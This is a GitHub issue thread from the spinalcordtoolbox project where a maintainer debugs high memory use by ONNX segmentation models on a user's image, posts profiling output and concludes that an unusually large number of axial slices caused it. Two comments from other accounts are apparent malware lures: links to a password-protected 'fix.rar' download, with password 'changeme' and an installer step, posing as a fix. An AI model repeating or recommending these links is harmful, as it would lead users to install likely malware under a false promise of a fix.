### ISSUE TITLE
Tensorflow-based ONNX models using a lot of memory on large image

### ISSUE THREAD

**Issue by joshuacwnewton** [spinalcordtoolbox/spinalcordtoolbox#4612]
When I first converted our old Tensorflow models to `.onnx` models in https://github.com/spinalcordtoolbox/spinalcordtoolbox/pull/3738, I ran into some memory issues described in https://github.com/spinalcordtoolbox/spinalcordtoolbox/pull/3738#discussion_r881735426. I thought I had fixed these issues by setting:

https://github.com/spinalcordtoolbox/spinalcordtoolbox/blob/56c7f6cdb0f763f1e287a3255b25ab532e257a00/spinalcordtoolbox/deepseg_/onnx.py#L14-L18

However, when working on a user's data (https://forum.spinalcordmri.org/t/i-am-unable-to-perform-gray-matter-segmentation/1296/2), with an image of size `113x200x200`, I ran into memory issues once more, to the point where the script `SIGKILL`'d. I will try to debug.

**Comment by joshuacwnewton** [comment]
By closing open programs (Firefox, PyCharm, etc.) I was able to get the processing to complete, which allowed me to run memory profiling:

```python
Filename: /home/joshua/repos/spinalcordtoolbox/spinalcordtoolbox/deepseg_/onnx.py

Line #    Mem usage    Increment  Occurrences   Line Contents
=============================================================
    13    188.9 MiB    188.9 MiB           1   @profile
    14                                         def onnx_inference(model_path, input_data):
    15                                             """Perform inference using an '.onnx' model."""
    16                                             # This option helps to combat an issue where the CPU memory arena would unnecessarily
    17                                             # consume ~6 gigabytes of memory, when our models only truly use ~5 megabytes. See also:
    18                                             # https://github.com/spinalcordtoolbox/spinalcordtoolbox/pull/3738#discussion_r881735426
    19    188.9 MiB      0.0 MiB           1       sess_options = ort.SessionOptions()
    20    188.9 MiB      0.0 MiB           1       sess_options.enable_cpu_mem_arena = False
    21                                         
    22    198.2 MiB      9.2 MiB           1       ort_sess = ort.InferenceSession(model_path, sess_options=sess_options)
    23     54.2 MiB   -144.0 MiB           1       preds = ort_sess.run(output_names=["predictions"], input_feed={"input_1": input_data})
    24     79.8 MiB     25.6 MiB           4       preds = [np.nan_to_num(arr) for arr in preds]
    25                                         
    26     79.8 MiB      0.0 MiB           1       return preds

```

Confusingly, this does not show much memory usage at all, which is different from what I saw previously in https://github.com/spinalcordtoolbox/spinalcordtoolbox/pull/3738#discussion_r881735426.

Still, here is the memory usage over time from System Monitor:

![Screenshot from 2024-08-27 10-47-58](https://github.com/user-attachments/assets/64ef5c35-ca02-4dd2-a3a0-0e5bd85a4400)

Very curious... :thinking:

**Comment by SupunDevendra** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by joshuacwnewton** [comment]
I've just noticed that this user's data has peculiar dimensions compared to our typical input data:

- `sct_example_data`: `320x320x32` (32 `320x320` high-resolution slices)
- User: `50x320x320` (320 `50x320` low-resolution slices)

Due to the vastly increased number of slices, I'm wondering if this is what has triggered the memory issues. And, we hadn't encountered this because most T2* scans have fewer slices.

**Comment by GoldenCaterpie** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by joshuacwnewton** [comment]
I think we can close this, as we now know the reason (large number of axial slices for a model meant to be used on on T2* images with fewer thick axial slices).
